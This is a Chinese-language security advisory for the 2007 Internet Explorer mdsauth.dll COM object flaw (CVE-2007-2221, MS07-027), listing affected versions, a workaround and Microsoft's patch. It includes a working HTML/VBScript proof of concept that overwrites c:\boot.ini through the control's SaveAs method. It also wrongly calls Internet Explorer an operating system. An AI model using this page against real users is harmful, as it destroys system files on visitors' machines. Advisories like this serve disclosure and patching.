发布日期：2007-05-08
更新日期：2007-05-10

受影响系统：

Microsoft Internet Explorer 5.0.1 SP4
    - Microsoft Windows 2000 SP4
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP SP2
    - Microsoft Windows Server 2003 SP2
    - Microsoft Windows Server 2003 SP1
Microsoft Internet Explorer 6.0 SP1
    - Microsoft Windows 2000 SP4
Microsoft Internet Explorer 7.0
    - Microsoft Windows XP SP2
    - Microsoft Windows Vista
    - Microsoft Windows Server 2003 SP2
    - Microsoft Windows Server 2003 SP1

描述：

---

BUGTRAQ  ID: 23827
CVE(CAN) ID: CVE-2007-2221

Internet Explorer是微软发布的非常流行的操作系统。

Internet Explorer所捆绑的Windows媒体服务器中的mdsauth.dll COM对象可能会覆盖任意文件，攻击者可能通过构建特制网页来利用此漏洞，如果用户访问了该网页，则可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。

<*来源：cocoruder （frankruder@hotmail.com）
  
  链接：http://secunia.com/advisories/38860/
        http://www.microsoft.com/technet/security/bulletin/ms07-027.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA07-128A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">

</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www[.]514[.]es"
target.SaveAs "c:\boot.ini"
</script>

</body>
</html>

建议：

---

临时解决方法：

* 禁止在Internet Explorer中运行COM对象。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS07-027）以及相应补丁:
MS07-027：Cumulative Security Update for Internet Explorer (931768)
链接：http://www.microsoft.com/technet/security/bulletin/ms07-027.mspx?pf=true

浏览次数：3535
严重程度：0（网友投票）